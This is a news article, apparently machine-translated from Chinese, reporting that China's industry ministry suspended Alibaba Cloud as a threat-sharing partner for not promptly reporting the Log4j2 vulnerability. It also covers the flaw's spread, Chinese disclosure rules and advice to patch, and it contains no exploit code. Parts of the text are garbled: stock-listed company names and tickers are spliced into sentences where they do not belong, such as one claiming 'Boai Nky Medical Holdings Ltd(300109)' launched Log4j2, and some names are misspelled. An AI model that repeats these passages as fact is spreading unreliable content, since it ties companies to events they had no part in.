Recently, the all media reporter of Nanfang finance and economics exclusively learned that the network security administration of the Ministry of industry and information technology reported that Alibaba cloud computing Co., Ltd. (hereinafter referred to as “Alibaba cloud”), as a partner of the network security threat information sharing platform of the Ministry of industry and information technology, failed to report to the competent telecommunications department in time after discovering serious security vulnerabilities in Apache log4j2 components, Failed to effectively support the Ministry of industry and information technology to carry out network security threat and vulnerability management. After research, Alibaba cloud is suspended as the above partner for 6 months. After the suspension expires, Alibaba cloud will study and resume the above-mentioned cooperative units according to the rectification of Alibaba cloud.
In an interview with reporters, many experts in the field of network security said that the vulnerability of Apache log4j2 component this time is a typical general vulnerability. As one of the most commonly used java program log monitoring components, log4j2 is applied in a variety of derivative frameworks. At the same time, it is also one of the basic components of the whole Java ecology. Once such components collapse, the impact will be destructive.
triggered a global computer security crisis
In 2001, software developer ceki gulcu designed a set of log library log4j based on Java language, and soon joined Apache, a non-profit organization specializing in open source software projects. In the subsequent software iterative upgrade, Apache launched the Boai Nky Medical Holdings Ltd(300109) project log4j2 on the basis of log4j. While retaining the original features, it added functions such as controlling the output destination, output format and defining the information level of log information. Soon, because of its simple, convenient and powerful features, it was widely used as a basic integration module in all kinds of open source systems using Java.
However, because of the wide applicability of log4j2, it has triggered a huge security crisis in the global computer field after it was revealed that there is a remote code execution security vulnerability.
Recently, the Google open source team scanned the Maven central repository, the most important repository for Java packages, and found that the Apache log4j library version used by 35863 packages was vulnerable to related vulnerabilities. Google reported that the number of Java packages affected accounted for 8% of Maven’s central repository. Considering the wide range of applications of the repository, the vulnerability will have a great impact on the ecology of the whole industry. A technician of a Beijing network security company told reporters that about 80 to 90 percent of Java related development may be affected by the vulnerability.
Fang Ning, senior vice president of Bangbang security, said in an interview with the 21st Century Business Herald reporter that the background logging function is a module that most systems will have. As a classic open source software, log4j2 will be directly integrated into the code when writing programs, and these new software may be integrated by other systems. After continuous superposition and nesting, once a security problem occurs in log4j2, the open source software and systems on the whole program chain will be affected, and the impact coverage is very wide.
In addition to the wide application range of log4j2 itself, another feature of this vulnerability is that the utilization method is very simple. According to experts, the attacker only needs to input a piece of code to the target and does not need the user to perform any redundant operations to trigger the vulnerability, enabling the attacker to remotely control the server of the victim user, and more than 90% of the application platforms developed based on Java will be affected.
According to the monitoring data of security domain cloud protection of Qi An Xin Technology Group Inc(688561) group, nearly 10000 attacks using this vulnerability had been found as of 12 noon on December 10. Qi An Xin Technology Group Inc(688561) the emergency response center has received more than ten vulnerability emergency response requests from important units, and reported the vulnerability information to the relevant competent departments on December 9. According to the person in charge of the patch vulnerability response platform, more than 100 pieces of information about the vulnerability submitted by white hat hackers were received in just one hour late on December 9.
The previously rampant network blackmail software launched a new round of large-scale blackmail attacks by taking advantage of the gap before major enterprises have not repaired the log4j2 vulnerability in time. Researchers from KnownSec 404 team and Sangfor Technologies Inc(300454) threat intelligence team reported that blackmail software such as tellyouthpass and Khonsari are using this vulnerability to launch attacks against Linux and windows systems and complete the installation directly on the user terminal.
report vulnerabilities to
According to the network security risk tips on major security vulnerabilities of Apache log4j2 component released by the Ministry of industry and information technology on its official website on December 17, on December 9, 2021, the network security threat and vulnerability information sharing platform of the Ministry of industry and information technology received a report from relevant network security professional institutions that Apache log4j2 component had serious security vulnerabilities. The Ministry of industry and information technology immediately organized relevant network security professional institutions to carry out vulnerability risk analysis, convened Alibaba cloud, network security enterprises and network security professional institutions to carry out research and judgment, reported and urged Apache Software Foundation to repair the vulnerability in time and provide risk early warning to industry units.
The tip also points out that the vulnerability may lead to remote control of the equipment, which may lead to serious harm such as theft of sensitive information and interruption of equipment service, which is a high-risk vulnerability. In order to reduce network security risks, relevant units and the public are reminded to pay close attention to the release of vulnerability patches for Apache log4j2 components, investigate the use of Apache log4j2 components in their own relevant systems, and upgrade the component version in time.
Prior to this, China has made specific requirements for the handling methods and processes of network vulnerabilities. Article 25 of the network security law stipulates: “network operators shall formulate emergency plans for network security events, and timely deal with security risks such as system vulnerabilities, computer viruses, network attacks and network intrusion; in case of events endangering network security, they shall immediately start the emergency plans, take corresponding remedial measures, and report to the relevant competent departments in accordance with the regulations.”
In July this year, the Ministry of industry and information technology, the state Internet information office and the Ministry of Public Security jointly issued the regulations on the management of network product security vulnerabilities, which put forward more detailed requirements on the responsibilities and obligations of network product providers, operators and information sharing platforms. Article 7 stipulates that after discovering or learning that there are security vulnerabilities in the network products provided, the network product provider shall immediately take measures and organize verification, evaluate the degree and scope of harm, and submit relevant vulnerability information to the network security threat and vulnerability information sharing platform of the Ministry of industry and information technology within 2 days; For security vulnerabilities in its upstream products or components, it shall immediately notify relevant product providers; If product users (including downstream manufacturers) need to take measures such as software and firmware upgrading, they shall be informed in time and provide necessary technical support.
In terms of platform, the network security threat and vulnerability information sharing platform of the Ministry of industry and information technology synchronously notifies the national network and information security information notification center and the national computer network emergency technology processing coordination center of relevant vulnerability information.
According to Fang Ning, at present, China’s national vulnerability collection and sharing platforms mainly include cnvd (national information security vulnerability sharing platform), cnnvd (national information security vulnerability database), etc. such platforms often recruit a large number of third-party security enterprises to deliver network security vulnerabilities to them for a long time. These third-party Enterprises serve as the support units of relevant departments, It is necessary to submit the discovered vulnerabilities to the national collection platform in time according to the regulations.
The impact of is expected to continue
At present, the number of enterprises and organizations affected and threatened by the log4j2 vulnerability is still growing. According to the statistics of the fire line Apache log4j2 vulnerability impact surface query website, as of press time, the vulnerability has affected more than 60000 open source software, involving more than 320000 software packages of relevant versions.
In addition to enterprises, some government agencies and social organizations have also become targets of hackers because they have not repaired log4j2 vulnerabilities in time. It is reported that on December 16 local time, the Belgian Ministry of defense was attacked by hackers using the vulnerability. The Belgian Minister of defense responded that his security team is trying to ensure network security and prevent similar incidents from happening again.
Although Apache officially released the log4j2 security update on December 8, its impact is expected to continue for a long time.
“It may take at least six months to reduce the impact of this vulnerability to a relatively small range.” Fang Ning explained that when such 0day vulnerabilities (vulnerabilities that have been discovered but have not yet been patched) were first discovered, they were often repaired by enterprises that pay more attention to security issues and have the corresponding financial and human resources. A large number of small and medium-sized enterprises may not be able to know the relevant situation without special network security departments and teams.
The technical director of a data company in Guangzhou told reporters that when a large number of small and medium-sized enterprises increasingly rely on various basic technical services provided by cloud service providers, cloud service providers are obliged to bear more social responsibilities for early warning and security.
Fang Ning said that at present, major security manufacturers have provided some automatic detection tools and scripts. Now the most important thing is that enterprises and relevant units pay attention to it and check it against their own product systems according to the solutions given by the national vulnerability library and vulnerability platform. The above technical personnel of Beijing network security company said that many developers can avoid being attacked by hackers by upgrading the software version in time. “The most critical thing is to do a good job of self-examination and upgrading.”
(21st Century Business Herald)